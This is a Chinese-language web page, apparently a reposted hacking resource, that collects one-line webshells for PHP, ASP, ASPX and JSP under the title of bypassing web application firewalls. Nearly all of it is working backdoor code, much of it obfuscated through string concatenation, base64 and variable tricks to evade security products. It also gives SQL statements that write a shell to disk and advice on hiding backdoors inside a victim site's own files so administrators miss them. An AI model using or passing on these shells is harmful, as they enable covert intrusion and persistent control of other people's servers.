新版绕过WAF

PHP 一句话========================================================'<pre><body><? @system($_GET[“cc”]); ?></body></pre>’ //可执行命令一句话普通一句话GIF89a<?php eval($_POST[cc123]) ?><?php @eval($_POST[‘cc123’]);?>过狗一句话select ‘<?php @eval($_POST[cmd]);?>’ into outfile ‘C:/Inetpub/wwwroot/mysql-php/1.php'<?php$_=””;$_[+$_]++;$_=$_.””;$___=$_[+””];//A$____=$___;$____++;//B$_____=$____;$_____++;//C$______=$_____;$______++;//D$_______=$______;$_______++;//E$________=$_______;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O$_________=$________;$_________++;$_________++;$_________++;$_________++;//S$_=$____.$___.$_________.$_______.’6′.’4′.’_’.$______.$_______.$_____.$________.$______.$_______;$________++;$________++;$________++;//R$_____=$_________;$_____++;

//T$__=$___.$_________.$_________.$_______.$________.$_____;$__($_(“ZXZhbCgkX1BPU1RbMV0p”)); ?><?php$_REQUEST[‘a’]($_REQUEST[‘b’]); ?><?php $t=$_GET[‘t’];$tt=$_GET[‘tt’];$s=$$t;$s($_REQUEST[‘cc123’]);?><?php $t=$_GET[‘t’]; //t=tt$tt=$_GET[‘tt’]; //tt=as$ttt=$_GET[‘ttt’]; //ttt=sert$s=$$t.$ttt;$s($_REQUEST[‘cc’]);?> <?php $t=$_GET[‘t’]; //t=tt$tt=$_GET[‘tt’]; //tt=as$ttt=$_GET[‘ttt’]; //ttt=s$tttt=$_GET[‘tttt’]; //ttt=ert$s=$$t.$ttt.$tttt;$s($_REQUEST[‘cc’]);?> <?php $t=$_GET[‘t’]; //t=tt$tt=$_GET[‘tt’]; //tt=as$ttt=$_GET[‘ttt’]; //ttt=tttt$tttt=$_GET[‘tttt’]; //ttt=sert$s=$$t.$$ttt;$s($_REQUEST[‘cc’]);?> <?php$a=$_REQUEST[‘a’]; //a=b;$b=$_REQUEST[‘b’]; //b=as;$c=$_REQUEST[‘c’]; //c=sert;$d=$_REQUEST[‘d’]; //d=c;$e=$$a.$$d;$e($_REQUEST[‘cc’]); ?><?php $a=$_REQUEST[‘a’]; //a=assert;$b=$_REQUEST[‘b’]; //b=a;$d=$$b;$d($_REQUEST[‘cc’]); ?> 几个变性的php–过防火墙 过狗效果都不错:<?php $a = str_replace(x,””,”axsxxsxexrxxt”);$a($_POST[“sz”]); ?><?php$lang = (string)key($_POST);$lang($_POST[‘sz’]);?><?php $k=”ass”.”ert”; $k(${“_PO”.”ST”} [‘sz’]);?><?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[“sz”]); ?>这个是90发的<?php@$_=”s”.”s”./*-/*-*/”e”./*-/*-*/”r”;@$_=/*-/*-*/”a”./*-/*-*/$_./*-/*-*/”t”;@$_/*-/*-*/($/*-/*-*/{“_P”./*-/*-*/”OS”./*-/*-*/”T”}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>密码-7phpv9 高版本拿shell<?php file_put_contents(‘c7.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW2NjMjc4OV0pOz8+’)); ?>../../../../html/special/cc/index====================================================================asp 一句话=================================================================<%execute(request(“cmd”))%><%execute request(“1”)%>ASP一句话16进制:┼攠數畣整爠煥敵瑳∨≡┩愾 密码a”%><%Eval(Request(chr(112)))%><%’ p2013过狗ASP系列 <%Y=request(“xindong”)%> <%execute(Y)%><%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“xindong”))%><%eval””&(“e”&”v”&”a”&”l”&”(“&”r”&”e”&”q”&”u”&”e”&”s”&”t”&”(“&”0″&”-“&”2″&”-“&”5″&”)”&”)”)%>(密码是-7)aspx一句话=======================================================================<%@ Page Language=”Jscript” validateRequest=”false” %><%Response.Write(eval(Request.Item[“w”],”unsafe”));%>jsp下的<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“/”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%> select ‘<?php eval($_POST[cmd];?>’ into outfile ‘C:/Inetpub/wwwroot/mysql-php/1.php’2013年收集————————————————————– PHP过狗:<?php if($_POST[x]!=”){$a=”base64_decode”; eval($a($_POST[z0]));}?> 密码:x<%a=request(“gold”)%><%eval a%>一句话就有过安全狗 和护卫神的PHP过安全狗一句话:fuck<?php eval($_POST[a])?><?php$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);?> 密码 4 该日志目录不存在或权限不足,请检查设置!<?php eval($_POST[a])?>过护卫神的。<%E=request(“1”)%>abc123456789<%execute E%> ASP过安全狗一句话密码(pass) <% %> <%a=request(“zl”)%><%eval a%> 原来代码是<%execute request(“cmd”)%> 把标签修改替换下来 为  <scriptlanguage=VBScript runat=server>execute request(“cmd”)</Script> 这样就避开了<%,%>符号!  表中数据段限制,一句话木马也写不下的情况  网络中流传的最小的木马代码是<%eval request(“#”)%> 如过连这也写不下怎么办?  将木马分开写就好了! <%Y=request(“x”)%> <%execute(Y)%> 这样分开写提交到数据库就没问题了!  不过,在ACCESS数据库中新增加的数据物理位置是在旧数据之前的,所以要先写<%execute(Y)%>部分。写好后在客户端写密码时除了填写”x”以外的任何字符都可以,如果填了”x”就会出错!  插入一句话容易爆错  例如  Sub unlockPost()  Dim id,replyid,rs,posttable  id=Request(“id”)  replyid=Request(“replyid”)  If Not IsNumeric(id) or id=”” Then  写成  Sub unlockPost(<%eval request(“#”)%>)  Dim id,replyid,rs,posttable  id=Request(“id”)  replyid=Request(“replyid”)  If Not IsNumeric(id) or id=”” Then  就可以了,也可以写成带容错语句的格式!!  <%if request(“cmd”)<>””then execute request(“cmd”)%>  一句话木马到两句话木马的转型!  一句话木马服务端原型:<%execute request(“value”)%> ,  变形后:<%On Error Resume Next execute request(“value”)%> ,  至于为什么要用两句话木马呢,是由于使我们的后门更加隐蔽.  我也试过用一句话插入WellShell的某个ASP文件里面,可是访问时经常出错,而插入两句话木马服务端却可以正常访问了,对站点的页面无任何影响.  这样就达到了隐蔽性更强的目的了,他管理员总不会连自己的网页文件都删了吧.  现在我的WellShell都有这样的后门.选择要插入两句话木马的ASP文件要注意,选一些可以用IE访问的ASP文件,不要选conn.asp这样的文件来插入.  当然,连接两句话木马的客户端仍然是用一句木马的客户端,不用修改.  一句话免杀:  一:变形法  比如:eval(request(“#”))这样的马儿呢,一般情况下是不被杀的。但实际上,经常杀毒软件会把eval(request列为特征码。所以我们变形一下  E=request(“id”)  eval(E)  这样可达到免杀的目的。  例如:<%execute request(“1”)%> 变形后:  <%E=request(“1”)  execute E%>  当然,这种变形是最好做的。  介绍第二种方法:因为很多管理员很聪明,它会检查ASP文件中的execute和eval函数。所以呢,不管你怎么反编译,它最终总是要用其中的一个函数来解释运行,所以还是被发现了。好么,我们用外部文件来调用。建一个a.jpg或者任何不被发现的文件后缀或文件名。写入 execute(request(“#”))当然,你可以先变形后现放上去。然后在ASP文件中插入  <!–#include file=”a.jpg” –>  来引用它,即可。  不过,管理员可以通过对比文件的方式找到修改过的文件,不过这种情况不多。  在WEBSHeLL中使用命令提示  在使用ASP站长助手6.0时点击命令提示符显示“没有权限”的时候,可以使用ASP站长助手上传CMD.exe到你的WEBSHELL目录(其它目录也行,把上传以后的CMD.exe绝对路径COPY出来),再修改你的WEBSHELL找到调用CMD.EXE的代码。原来的代码如下  .exec(“cmd.exe /c “&DefCmd).stdout.readall  修改为  .exec(“你想上传的cmd.exe绝对路径” /c”&DefCmd).stdout.readall  比如你上传到的目录是D:\web\www\cmd.exe,那么就修改成  .exec(“D:\web\www\cmd.exe /c”&DefCmd).stdout.readallPHP系列<?php $a = str_replace(x,””,”axsxxsxexrxxt”);$a($_POST[“xindong”]); ?><?php $lang = (string)key($_POST);$lang($_POST[‘xindong’]);?><?php $k=”ass”.”ert”; $k(${“_PO”.”ST”} [‘xindong’]);?><?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[“xindong”]); ?><?php @$_=”s”.”s”./*-/*-*/”e”./*-/*-*/”r”; @$_=/*-/*-*/”a”./*-/*-*/$_./*-/*-*/”t”; @$_/*-/*-*/($/*-/*-*/{“_P”./*-/*-*/”OS”./*-/*-*/”T”} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> 密码是 -7ASPX系列ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp<%@ Page Language = Jscript %> <%var/*-/*-*/P/*-/*-*/=/*-/*-*/”e”+”v”+/*-/*-*/”a”+”l”+”(“+”R”+”e”+/*-/*-*/”q”+”u”+”e”/*-/*-*/+”s”+”t”+ “[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]”+ “,”+”\””+”u”+”n”+”s”/*-/*-*/+”a”+”f”+”e”+”\””+”)”;eval (/*-/*-*/P/*-/*-*/,/*-/*-*/”u”+”n”+”s”/*-/*-*/+”a”+”f”+”e”/*-/*-*/);%> 密码 -7<%@ Page Language=”Jscript”%><%eval(Request.Item[“xindong”],”unsafe”);%><script language=”C#” runat=”server”> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y(“add6bb58e139be10″); </script> 密码是webadmin2014年收集————————————————支持变异菜刀连接以过安全狗,过啊D 文件扫描的一句话实已经不是一句话了,好几句了都。继续上次的:我使用的一句话的几种姿态这回研究了下PHP,发一下我使用的一句话(可过文件扫描)。<?php $mujj = $_POST[‘z’]; if ($mujj!=””) { $xsser=base64_decode($_POST[‘z0’]); @eval(“\$safedg = $xsser;”); } ?>密码z,支持菜刀连接;支持变异菜刀连接以过安全狗。另外:ASP:<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),”/*/”,””””),”\*\”,vbCrlf)End FunctionExecute MorfiCoder(“)/*/z/*/(tseuqer lave”) %>ASPX:<script runat=”server” language=”JScript”> function popup(str) { var q = “u”; var w = “afe”; var a = q + “ns” + w; var b= eval(str,a); return(b); } </script> <% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(“UmVxdWVzdC5JdGVtWyJ6Il0=”)))); %>分享是交流的关键,我不喜欢什么大马 小马 一句话是我的最爱,不仅隐藏性高 免杀效果好 而且无后门(当然排除菜刀有) —- 没禁用一句话post的情况下 几个变性的asp–过防火墙 过狗效果都不错:<%Y=request(“x”)%> <%execute(Y)%><%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“sz”))%> 这个是90发的<%eval””&(“e”&”v”&”a”&”l”&”(“&”r”&”e”&”q”&”u”&”e”&”s”&”t”&”(“&”0″&”-“&”2″&”-“&”5″&”)”&”)”)%>密码-7 aspx的 过狗效果不怎么样—不过我认为能支持aspx 百分之8/90支持asp 90发的<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/”e”+”v”+/*-/*-*/”a”+”l”+”(“+”R”+”e”+/*-/*-*/”q”+”u”+”e”/*-/*-*/+”s”+”t”+”[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]”+”,”+”\””+”u”+”n”+”s”/*-/*-*/+”a”+”f”+”e”+”\””+”)”;eval(/*-/*-*/P/*-/*-*/,/*-/*-*/”u”+”n”+”s”/*-/*-*/+”a”+”f”+”e”/*-/*-*/);%>密码-7<%@ Page Language=”Jscript”%><%eval(Request.Item[“sz”],”unsafe”);%><script language=”C#” runat=”server”> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y(“add6bb58e139be10”); </script> 密码是webadmin大家伙 把你们手中好的发出来共享下吧 别藏着了

资源下载
下载价格免费

原文链接:https://duduziy.com/413.html,转载请注明出处。 郑重声明: 本站所有内容仅供大家参考、学习,不存在任何商业目的与商业用途。 若您需要商业运营或用于其他商业活动,请您购买正版授权并合法使用。 我们不承担任何技术及版权问题,且不对任何资源负法律责任。 如遇到资源无法下载,请点击这里失效报错。失效报错提交后记得查看你的留言信息,24小时之内反馈信息。 如有侵犯您的版权,请给我们私信,我们会尽快处理,并诚恳的向你道歉!

0

评论0

显示验证码
没有账号?注册  忘记密码?